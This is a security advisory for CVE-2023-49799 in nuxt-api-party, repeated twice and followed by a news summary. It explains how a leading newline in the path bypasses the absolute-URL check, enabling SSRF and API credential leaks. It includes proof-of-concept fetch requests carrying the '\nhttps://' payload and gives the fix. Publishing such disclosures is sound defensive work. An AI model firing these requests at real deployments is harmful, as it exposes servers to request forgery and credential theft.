Headline
GHSA-3wfp-253j-5jxv: SSRF & Credentials Leak
Summary
nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.
This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.
Details
nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://.
This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com has a leading newline.
According to the fetch specification, before a fetch is made the URL is normalized. “To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.” (source)
This means the final request will be normalized to https://whatever.com. We have bypassed the check and nuxt-api-party will send a request outside of the whitelist.
This could allow us to leak credentials or perform SSRF.
PoC
POC using Node.
await fetch("/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})
We can use __proto__ as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint will be undefined.
await fetch("/api/__api_party/__proto__", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})
Impact
Leak of sensitive API credentials. SSRF.
Fix
Revert to the previous method of detecting absolute URLs.
if (new URL(path, 'http://localhost').origin !== 'http://localhost') {
// ...
}
Summary
nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.
This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.
Details
nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://.
This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com has a leading newline.
According to the fetch specification, before a fetch is made the URL is normalized. “To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.” (source)
This means the final request will be normalized to https://whatever.com. We have bypassed the check and nuxt-api-party will send a request outside of the whitelist.
This could allow us to leak credentials or perform SSRF.
PoC
POC using Node.
await fetch("/api/__api_party/MyEndpoint", { method: "POST", body: JSON.stringify({ path: “\nhttps://google.com” }), headers: { "Content-Type": “application/json” } })
We can use proto as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint will be undefined.
await fetch("/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: “\nhttps://google.com” }), headers: { "Content-Type": “application/json” } })
Impact
Leak of sensitive API credentials. SSRF.
Fix
Revert to the previous method of detecting absolute URLs.
if (new URL(path, ‘http://localhost’).origin !== ‘http://localhost’) { // … }
References
- GHSA-3wfp-253j-5jxv
- https://nvd.nist.gov/vuln/detail/CVE-2023-49799
- johannschopplich/nuxt-api-party@72762a2
- https://fetch.spec.whatwg.org/
- https://fetch.spec.whatwg.org/#http-whitespace-byte
- https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L31
- https://infra.spec.whatwg.org/#byte-sequence
Related news
`nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `\nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.". This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previou...